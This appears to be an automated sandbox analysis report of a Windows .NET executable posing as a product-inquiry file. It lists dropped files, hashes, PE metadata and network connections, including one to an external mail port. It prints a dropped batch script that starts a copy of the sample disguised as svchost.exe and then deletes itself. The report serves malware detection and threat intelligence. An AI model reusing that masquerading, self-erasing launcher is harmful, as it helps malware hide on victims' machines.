                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):151
                                                                        Entropy (8bit):5.07788813917422
                                                                        Encrypted:false
                                                                        SSDEEP:3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRI3oaLHVZPy:hWKqTtT6wknaZ5Omq1wkn23fTNazVk
                                                                        MD5:FC80A1DB853B4A98AAE9CE901F05BF6E
                                                                        SHA1:820B615C0B086E37094B49DE81E8518083CAFFD7
                                                                        SHA-256:B68843F1BC66F94BB3C2644ABBD565FEC94AA27A79132C6AE51C1B701A6FF26A
                                                                        SHA-512:D44FACA4404E787713CE50E5E81968283D29769F4B55C1B96DA27AEC61420869E9E0D798D19DBD9431120FE355EFB4DA1E359EE2750C3767802972F17E80EAA2
                                                                        Malicious:false
                                                                        Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp89F4.tmp.bat" /f /q..
                                                                        Process:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):690092
                                                                        Entropy (8bit):7.889824999593694
                                                                        Encrypted:false
                                                                        SSDEEP:12288:A5rkOKFLWcw4n3BzGC9t1SJFrg632LvRpVR09BQoq:ckOKFiX4xy6c86G7BR09B3q
                                                                        MD5:E184C8B191B12744E919B3B95CE39A0E
                                                                        SHA1:FE25931E12B1F5807B95CF222CD9EE74C2CB7EA2
                                                                        SHA-256:DF9E900BC2ABA3462D0B9D2FB4E81719604F4C63871A2225EDCE136C140E8FC8
                                                                        SHA-512:8DF2BB22F07EB282247D5B98D627FC5CF8D5AC9958304C43A8916EB4EF2ECF9627AD753C07206576E9550672E57581767DCB0B1CF140BC7F2F76BDEF37A89719
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                        • Antivirus: Virustotal, Detection: 36%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..Z............... ....@...... .......................`......v.....`.............................................................f............................y............................................................... ..H............text....Z... ...\.................. ..`.rsrc...f............^..............@..@........................................H.......|>...;......M...................................................".(.....*b.(............%...}....*>.(.......}....*>.(.......}....*".(.....*B...}......}....**..(......**...(....&**...(....&**...(....&*.~'...*...'...*.~(...*...(...*.~)...*...)...*.~*...*...*...*R...{ ... ....`} ...*R...{ ... ...._} ...*R...{ ... ...@`} ...*R...{ ... ...._} ...*R...{ ... ... `} ...*R...{ ... ...._} ...*>..|.....(?....**...(?....*".(.....*".(.....*".(.....*n.{M...{K....{L....X.......*.0..8.......
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):43008
                                                                        Entropy (8bit):6.244941989510716
                                                                        Encrypted:false
                                                                        SSDEEP:384:ac3JOvwWj8Gpw0A67dOpRipKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+TsPZX:a4JU8g17dG6Iq8XMnVYqW2Xmh829ukc
                                                                        MD5:9827FF3CDF4B83F9C86354606736CA9C
                                                                        SHA1:E73D73F42BB2A310F03EB1BCBB22BE2B8EB7C723
                                                                        SHA-256:C1CF3DC8FA1C7FC00F88E07AD539979B3706CA8D69223CFFD1D58BC8F521F63A
                                                                        SHA-512:8261828D55F3B5134C0AEB98311C04E20C5395D4347251746F3BE0FB854F36CC7E118713CD00C9867537E6E47D5E71F2B2384FC00C67F0AE1B285B8310321579
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Joe Sandbox View:
                                                                        • Filename: PO454323 Pdf.exe, Detection: malicious, Browse
                                                                        • Filename: SARL RABINEAU Order FA2495.exe, Detection: malicious, Browse
                                                                        • Filename: 090998948.vbs, Detection: malicious, Browse
                                                                        • Filename: SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exe, Detection: malicious, Browse
                                                                        • Filename: FEDEX & INVOICE.Tracking Details.exe, Detection: malicious, Browse
                                                                        • Filename: 63762524.vbs, Detection: malicious, Browse
                                                                        • Filename: 48727365.vbs, Detection: malicious, Browse
                                                                        • Filename: 329182736.vbs, Detection: malicious, Browse
                                                                        • Filename: payment pdf.exe, Detection: malicious, Browse
                                                                        • Filename: FAC- IST9G4VW.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D>.]..............0..X...........w... ........@.. ..............................p.....`.................................Hw..O....... ............f...B...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..
                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):1835008
                                                                        Entropy (8bit):4.465522001984657
                                                                        Encrypted:false
                                                                        SSDEEP:6144:eIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbr:zXD94OWlLZMM6YFH5+r
                                                                        MD5:FF1F583D2D45CD4C3F8401CD449F2170
                                                                        SHA1:95D0637022E64B84B026FDCFF65AD364F911EC6A
                                                                        SHA-256:857CCAADB2353FBDE5ABEA77487E455B7F93BF439FFBDECDDF45AD5D787130B1
                                                                        SHA-512:DEE945F6816CB744463F129169F26AA801F29AFBE56637DC58BFF208230C00ECE29DE8A912443B4AA3B82E246FC5E9B9A85557ABBBB37E805A49773AFE2CF9EB
                                                                        Malicious:false
                                                                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.%H.................................................................................................................................................................................................................................................................................................................................................3|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\timeout.exe
                                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.41440934524794
                                                                        Encrypted:false
                                                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                        Malicious:false
                                                                        Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                        File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.889824999593694
                                                                        TrID:
                                                                        • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                        • Win64 Executable Console (202006/5) 47.64%
                                                                        • Win64 Executable (generic) (12005/4) 2.83%
                                                                        • Generic Win/DOS Executable (2004/3) 0.47%
                                                                        • DOS Executable Generic (2002/1) 0.47%
                                                                        File name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                                                                        File size:690'092 bytes
                                                                        MD5:e184c8b191b12744e919b3b95ce39a0e
                                                                        SHA1:fe25931e12b1f5807b95cf222cd9ee74c2cb7ea2
                                                                        SHA256:df9e900bc2aba3462d0b9d2fb4e81719604f4c63871a2225edce136c140e8fc8
                                                                        SHA512:8df2bb22f07eb282247d5b98d627fc5cf8d5ac9958304c43a8916eb4ef2ecf9627ad753c07206576e9550672e57581767dcb0b1cf140bc7f2f76bdef37a89719
                                                                        SSDEEP:12288:A5rkOKFLWcw4n3BzGC9t1SJFrg632LvRpVR09BQoq:ckOKFiX4xy6c86G7BR09B3q
                                                                        TLSH:25E41207F61CA38ED7DA8AF6397A023012289FA35940BC49F9E8FD6D153178C69135E7
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..Z............... ....@...... .......................`......v.....`................................
                                                                        Icon Hash:24ed8d96b2ade832
                                                                        Entrypoint:0x400000
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows cui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0xFAFBEEAE [Sat Jun 9 06:43:58 2103 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:
                                                                        Instruction
                                                                        dec ebp
                                                                        pop edx
                                                                        nop
                                                                        add byte ptr [ebx], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+eax], al
                                                                        add byte ptr [eax], al
                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0xd866 | .rsrc
                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x79fe | 0x1c | .text
                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                         .text | 0x2000 | 0x5a1a | 0x5c00 | 457150ed573d86e059095744a029ff6f | False | 0.490531589673913 | data | 5.84563717318207 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                         .rsrc | 0x8000 | 0xd866 | 0xda00 | bcd9c5f638d0c24686a93e204983d0c2 | False | 0.09005877293577981 | data | 3.7589393984411688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                         RT_ICON | 0x8144 | 0xd228 | Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m | | | 0.07864312267657993
                                                                         RT_GROUP_ICON | 0x1536c | 0x14 | data | | | 1.15
                                                                         RT_VERSION | 0x15380 | 0x2fc | data | | | 0.43455497382198954
                                                                         RT_MANIFEST | 0x1567c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                         May 8, 2024 09:20:47.086616993 CEST | 49675 | 443 | 192.168.2.4 | 173.222.162.32
                                                                         May 8, 2024 09:20:48.242893934 CEST | 49678 | 443 | 192.168.2.4 | 104.46.162.224
                                                                         May 8, 2024 09:20:56.695885897 CEST | 49675 | 443 | 192.168.2.4 | 173.222.162.32
                                                                         May 8, 2024 09:21:03.240431070 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:03.240458012 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:03.240546942 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:03.278233051 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:03.278249025 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:03.616898060 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:03.616978884 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:03.628257990 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:03.628277063 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:03.628508091 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:03.680249929 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:04.518321991 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:04.560128927 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:04.734947920 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:04.735007048 CEST | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:04.735138893 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:04.759654999 CEST | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:05.093671083 CEST | 49731 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:05.256122112 CEST | 80 | 49731 | 208.95.112.1 | 192.168.2.4
                                                                         May 8, 2024 09:21:05.256225109 CEST | 49731 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:05.256422043 CEST | 49731 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:05.419017076 CEST | 80 | 49731 | 208.95.112.1 | 192.168.2.4
                                                                         May 8, 2024 09:21:05.461514950 CEST | 49731 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:08.692528009 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:08.692581892 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:08.692656040 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:08.767729044 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:08.767777920 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.104895115 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.104975939 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:09.106631041 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:09.106650114 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.106952906 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.165087938 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:09.208125114 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.527292967 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.527354956 CEST | 443 | 49732 | 104.26.13.205 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.527580976 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:09.531440973 CEST | 49732 | 443 | 192.168.2.4 | 104.26.13.205
                                                                         May 8, 2024 09:21:09.538868904 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:09.700952053 CEST | 80 | 49733 | 208.95.112.1 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.701035023 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:09.701174974 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:09.864020109 CEST | 80 | 49733 | 208.95.112.1 | 192.168.2.4
                                                                         May 8, 2024 09:21:09.977161884 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:11.006592035 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:11.168792009 CEST | 80 | 49733 | 208.95.112.1 | 192.168.2.4
                                                                         May 8, 2024 09:21:11.168889999 CEST | 49733 | 80 | 192.168.2.4 | 208.95.112.1
                                                                         May 8, 2024 09:21:11.272459030 CEST | 49739 | 587 | 192.168.2.4 | 185.230.214.164
                                                                        May 8, 2024 09:21:11.594496965 CEST58749739185.230.214.164192.168.2.4
                                                                        May 8, 2024 09:21:11.594607115 CEST49739587192.168.2.4185.230.214.164
                                                                        May 8, 2024 09:21:11.920242071 CEST58749739185.230.214.164192.168.2.4
